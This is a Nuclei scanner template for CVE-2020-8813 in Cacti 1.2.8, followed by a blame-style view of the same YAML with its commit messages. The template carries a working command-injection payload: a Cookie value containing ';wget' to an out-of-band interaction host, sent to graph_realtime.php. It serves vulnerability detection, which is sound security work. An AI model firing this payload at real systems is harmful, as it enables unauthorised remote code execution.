nuclei-templates/cves/2020/CVE-2020-8813.yaml

id: CVE-2020-8813

info:
  name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
  author: gy741
  severity: high
  description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
  reference:
    - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
  tags: cve,cve2020,cacti,rce,oast
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.80
    cve-id: CVE-2020-8813
    cwe-id: CWE-78

requests:
  - raw:
      - |
        GET /graph_realtime.php?action=init HTTP/1.1
        Host: {{Hostname}}
        Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
Create CVE-2020-8813.yaml This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-26 02:32:23 +00:00			`id: CVE-2020-8813`

			`info:`
			`name: Cacti v1.2.8 - Unauthenticated Remote Code Execution`
			`author: gy741`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: high`
Remove: - various nonstandard ascii chars in favor of the standard ones (mostly quotes) - spaces after : in some files 2022-01-25 19:38:53 +00:00			`description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Create CVE-2020-8813.yaml This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-26 02:32:23 +00:00			`- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/`
oob tags update 2021-10-18 20:40:26 +00:00			`tags: cve,cve2020,cacti,rce,oast`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.80`
			`cve-id: CVE-2020-8813`
			`cwe-id: CWE-78`
Create CVE-2020-8813.yaml This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-26 02:32:23 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`GET /graph_realtime.php?action=init HTTP/1.1`
			`Host: {{Hostname}}`
			`Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}`

			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the HTTP Interaction`
			`words:`
			`- "http"`